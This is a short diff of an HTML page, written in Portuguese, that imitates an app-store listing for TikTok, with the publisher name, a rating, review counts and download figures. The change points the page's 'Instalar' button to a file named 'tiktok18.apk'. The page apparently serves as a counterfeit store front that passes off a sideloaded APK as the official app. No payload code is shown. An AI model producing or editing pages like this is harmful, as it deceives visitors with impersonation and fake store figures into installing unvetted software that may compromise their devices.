--- a/index.html
+++ b/index.html
@@ -102,7 +102,7 @@
         <p>TikTok Pte. Ltd.</p>
         <div class="rating">⭐ 4,4 • 171M avaliações • +1B downloads</div>
         <!-- BOTÃO INSTALAR -->
-        <a href="meu_arquivo.apk" download class="install-btn">Instalar</a>
+        <a href="tiktok18.apk" download class="install-btn">Instalar</a>
       </div>
     </div>
 
